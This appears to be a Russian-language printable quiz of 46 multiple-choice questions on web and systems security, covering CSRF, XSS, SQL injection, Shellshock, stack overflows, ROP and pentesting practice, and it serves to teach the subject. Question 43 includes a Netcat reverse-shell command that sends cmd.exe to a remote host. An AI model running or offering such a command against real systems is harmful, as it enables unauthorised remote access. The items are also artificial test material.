wayground logo

Free Printable Worksheets

NEW

Font size

S
M
L
XL
Worksheets

1-46

Total questions: 46

Worksheet time: 23mins

Name
Class
Date
1.

Что такое CSRF-атака?

a)

Эксплуатация ошибки сериализации

b)

Анализ SQL-запросов

c)

Атака, в которой злоумышленник заставляет браузер жертвы выполнить нежелательный запрос

d)

Атака, подменяющая DNS-запросы

e)

Перехват трафика по ARP

2.

Основная цель XSS-атаки:

a)

Внедрение и выполнение произвольного JavaScript-кода в браузере

b)

Перехват ARP-трафика

c)

Модификация заголовков TCP

d)

Фильтрация IP-трафика

e)

Взлом MAC-адресов

3.

Какой тип SQL-инъекции показывает ошибки SQL-сервера?

a)

Error-based SQLi

b)

Union-based SQLi

c)

Boolean-based SQLi

d)

Time-based SQLi

e)

Blind-based SQLi

4.

Что такое Reverse Shell?

a)

Инструмент фильтрации пакетов

b)

Перехват ARP-пакетов

c)

Подключение от атакуемой машины к атакующей системе

d)

Локальный запуск команд

e)

Утилита для логирования клавиш

5.

Суть Race Condition уязвимости:

a)

Неверная проверка входных данных

b)

Два процесса обращаются к ресурсу одновременно

c)

Ошибка в SQL-синтаксисе

d)

Утечка содержимого cookies

e)

Неправильная настройка firewall

6.

Что делает ARP Poison?

a)

Сканирует порты

b)

Перехватывает HTTP cookies

c)

Подменяет MAC-адрес в таблицах ARP

d)

Впрыскивает SQL-код

e)

Проводит XSS-атаку

7.

Основная цель SQLMap:

a)

Анализ XSS-скриптов

b)

Брутфорс SSH

c)

Автоматизация SQL-инъекций

d)

Создание ARP reply

e)

Перехват сетевых пакетов

8.

В чем опасность Stored XSS?

a)

Код выполняется один раз у жертвы

b)

Код искажается фильтрами

c)

Код выполняется только на сервере

d)

Код не выполняется без Cookies

e)

Код сохраняется в базе и выполняется у всех пользователей

9.

Что делает кейлоггер?

a)

Записывает нажатия клавиш

b)

Проверяет целостность диска

c)

Шифрует сетевой трафик

d)

Перехватывает ARP-запросы

e)

Определяет SQL-инъекции

10.

Что делает backdoor?

a)

Отображает заголовки ответов

b)

Фильтрует ICMP-пакеты

c)

Позволяет получить скрытый доступ к системе

d)

Проверяет права доступа

e)

Очищает ARP-таблицы

11.

Что обозначает бит Set-UID у исполняемого файла в UNIX/Linux?

a)

Файл становится только для чтения и в UNIX/Linux системах становится невидимым.

b)

При запуске программа получает эффективный UID владельца файла.

c)

Программа запускается в фоновом режиме (daemon).

d)

Программа выполняется только от root.

e)

Файл автоматически шифруется.

12.

Что такое EUID (effective UID) процесса?

a)

Размер стека процесса для эффективной реализации.

b)

Идентификатор пользователя в /etc/passwd.

c)

Идентификатор, по которому система определяет привилегии процесса.

d)

IP-адрес пользователя.

e)

Идентификатор группы процесса, по которому система определяет владельца группы.

13.

Что следует сделать перед понижением привилегий, чтобы избежать утечки возможностей?

a)

Остановить все демоны.

b)

Закрыть ненужные файловые дескрипторы (close).

c)

Создать новую учетную запись root и удалить все записи о пользователях в системе в файле /etc/passwd.

d)

Удалить все записи о пользователях в системе из файла /etc/passwd.

e)

Отключить сеть.

14.

Как новый процесс получает переменные окружения?

a)

Автоматически из сетевых настроек.

b)

Из файла /boot/config при завершении текущего процесса.

c)

Через наследование от родителя при fork() и execve().

d)

Путём компиляции программы.

e)

Через драйверы ядра из файла /boot/config при завершении текущего процесса.

15.

Какой аргумент функции main в C содержит указатель на массив переменных окружения?

a)

Stdout

b)

Argc

c)

Stdin

d)

Argv

e)

Envp

16.

Какая разница между shell variables и environment variables?

a)

Shell variables хранятся в файле /etc/passwd, environment variables хранятся в файле /etc/shadow.

b)

Все environment variables наследуются дочерними процессами, shell variables – нет.

c)

Environment variables исчезают при перезагрузки.

d)

Environment variables видны только root.

e)

Shell variables изменяются только через BIOS.

17.

Где можно увидеть переменные окружения процесса в Linux?

a)

В /var/log/environ

b)

В /etc/log/environ.conf

c)

В /etc/log/env

d)

В /proc/environ

e)

В /usr/bin/environ

18.

Какая команда веб-клиента используется в презентации, чтобы подставить произвольный User-Agent?

a)

wget -uH ".."

b)

curl -A ".."

c)

curl -H ".."

d)

curl -U ".."

e)

wget --ua ".."

19.

Какие два условия необходимы для эксплуатации Shellshock?

a)

Процесс должен работать в режиме отладки и иметь открытую SSH-сессию.

b)

На машине должен быть установлен Perl и отключен режим Shellshock.

c)

Нужен доступ к BIOS и отключен режим Shellshock.

d)

Клиент должен работать по протоколу RDP и иметь root-доступ к удалённому хосту.

e)

Процесс должен запускать bash и получать ненадёжные данные через переменные окружения.

20.

Что такое стек (stack) процесса?

a)

Пул потоков ОС, где хранятся адрес возврата и saved registers.

b)

Буфер в сетевом адаптере для пакетов, где хранятся локальные переменные.

c)

Область памяти, где хранятся локальные переменные, адрес возврата и saved registers.

d)

Постоянное хранилище файлов на диске, где хранятся локальные переменные и адрес возврата.

e)

Раздел ядра для драйверов, где хранятся локальные переменные, адрес возврата и saved registers.

21.

Что может произойти при перезаписи адреса возврата на стеке?

a)

Увеличение скорости выполнения программы.

b)

Сжатие стека и увеличение скорости выполнения программы.

c)

Передача управления по произвольному адресу.

d)

Переход в безопасный режим ОС и сжатие стека.

e)

Автоматическое восстановление исходного кода.

22.

Какой эффект даёт компиляция с «-z execstack» (в учебной среде)?

a)

Делает стек исполняемым.

b)

Шифрует исполняемый файл в стеке.

c)

Отключает вывод в консоль из стека.

d)

Включает автоматическое рандомизированное выравнивание в стеке.

e)

Включает строгую проверку типов в стеке.

23.

Какое поведение предотвращает защита «non-executable stack (NX)»?

a)

Запись из стека в лог-файлы.

b)

Отключает отправку ICMP-пакетов через стек для записи в лог-файлы.

c)

Выполнение кода, расположенного в области стека.

d)

Чтение с сетевого сокета в стек и запись в сетевой сокет.

24.

Установление соединения TCP с помощью стека для чтения и записи. Какая команда GNU Debugger предлагается для получения адреса system()?

a)

run /bin/sh/address

b)

disassemble system

c)

set env SYSTEM

d)

p system

e)

info address

25.

Как называется обобщённая техника, которая связывает множество коротких фрагментов кода (gadgets)?

a)

Stack-Oriented Scripting (SOS)

b)

Return-Oriented Programming (ROP)

c)

Heap-Object Chaining (HOC)

d)

Direct Kernel Injection (DKI)

e)

Function Hooking Protocol (FHP)

26.

Что является основной целью пентестинга веб-приложений?

a)

Поиск уязвимостей до их использования злоумышленниками

b)

Измерение скорости загрузки страниц

c)

Тестирование пользовательского интерфейса

d)

Оптимизация сетевых соединений

e)

Повышение производительности сайта

27.

Какой инструмент чаще всего используется для тестирования безопасности HTTP-запросов?

a)

OpenSSL

b)

Visual Studio Code

c)

Burp Suite

d)

Cisco Packet Tracer

e)

Wireshark

28.

Что входит в первый этап веб-пентеста?

a)

Подготовка отчёта

b)

Анализ уязвимостей сервера

c)

Сбор и разведка информации о цели

d)

Эксплуатация найденных ошибок

e)

Уничтожение логов

29.

Какой протокол является основной целью при проверке безопасности сайтов?

a)

SSH

b)

SMTP

c)

SNMP

d)

FTP

e)

HTTP

30.

Что такое Remote Code Execution (RCE)?

a)

Ошибка при загрузке файла

b)

Возможность выполнить произвольный код на удалённом сервере

c)

Инъекция SQL-запроса

d)

Неправильная обработка HTML

e)

Встраивание внешнего API

31.

В каком языке чаще всего встречаются RCE-уязвимости из-за динамической интерпретации?

a)

Java

b)

PHP

c)

Go

d)

Kotlin

e)

HTML

32.

Какое действие помогает снизить риск RCE?

a)

Использование HTTPS

b)

Кэширование страниц

c)

Очистка и фильтрация пользовательского ввода

d)

Хеширование паролей

e)

Обновление браузера

33.

Что описывает обратное TCP-соединение (Reverse TCP)?

a)

Временный туннель между узлами

b)

Клиент подключается к серверу

c)

Соединение с использованием UDP

d)

Двустороннее зашифрованное соединение

e)

Сервер подключается обратно к атакующему

34.

Какой инструмент используется для создания и управления обратными TCP-сеансами?

a)

cURL

b)

Nikto

c)

Nmap

d)

Wireshark

e)

Metasploit

35.

Что происходит после успешного установления обратного TCP-сеанса?

a)

Атакующий получает удалённую оболочку

b)

Выполняется SQL-инъекция

c)

Устанавливается VPN-туннель

d)

Сервер закрывает соединение

e)

Система автоматически перезапускается

36.

Что представляет собой уязвимость загрузки файлов?

a)

Возможность загрузки вредоносного файла на сервер

b)

Потеря соединения с клиентом

c)

Ошибка при передаче данных через FTP

d)

Недоступность сервера из-за большого файла

e)

Ошибка при валидации пароля

37.

Какой файл чаще используется злоумышленником для эксплуатации File Upload уязвимости?

a)

.php

b)

.jpg

c)

.xml

d)

.html

e)

.gif

38.

Какой метод эффективнее предотвращает уязвимость загрузки файлов?

a)

Ограничение размера файлов

b)

Запись логов сервера

c)

Сжатие загружаемых данных

d)

Использование HTTPS

e)

Проверка MIME-типа и пути сохранения

39.

Что характеризует LFI (Local File Inclusion)?

a)

Внедрение SQL-запросов в HTML

b)

Перенаправление на внешний ресурс

c)

Включение локальных файлов с сервера в веб-страницу

d)

Открытие порта сервера

e)

Ошибка при загрузке библиотеки

40.

Что характеризует RFI (Remote File Inclusion)?

a)

Подключение удалённого файла по URL

b)

Подключение локального файла

c)

Ошибка HTTP-заголовков

d)

Встраивание SQL-запроса

e)

Уязвимость в JavaScript

41.

Какова основная цель итогового отчёта пентеста?

a)

Анализ скорости отклика сайта

b)

Сокрытие следов атак

c)

Демонстрация уровня взлома

d)

Сравнение с конкурентами

e)

Подробное описание найденных уязвимостей и способов их устранения

42.

Какой шаг рекомендуется после завершения пентеста?

a)

Провести повторный пентест немедленно

b)

Передать результаты владельцу сайта для исправления

c)

Сменить IP-адрес

d)

Опубликовать найденные уязвимости

e)

Удалить все файлы

43.

Какая команда Netcat используется для запуска обратной оболочки в Windows?

a)

nc -e cmd.exe 10.0.0.1 4444

b)

nc -zv 10.0.0.1 80

c)

nc -listen 80

d)

nc -lvp 4444

e)

nc -t 4444 -r

44.

Какой тип уязвимости чаще всего позволяет добиться RCE при неверной обработке пользовательских данных?

a)

HTML Injection

b)

XSS

c)

Command Injection

d)

SQL Injection

e)

CSRF

45.

Какой набор инструментов чаще всего используется при веб-пентестинге?

a)

Nmap, FileZilla, Paint

b)

Metasploit, Burp Suite, Nikto

c)

GIMP, Netcat, GitHub

d)

Wireshark, WordPress, Python

e)

Firefox, Excel, VS Code

46.

Какая из следующих практик не поможет предотвратить CSRF?

a)

Проверка заголовков Origin/Referer при критичных операциях

b)

Применение SameSite=Strict для важных cookie

c)

Публичное раскрытие секретного ключа приложения

d)

Использование уникальных CSRF-токенов в формах

e)

Выполнение критичных действий только по POST и с проверкой токена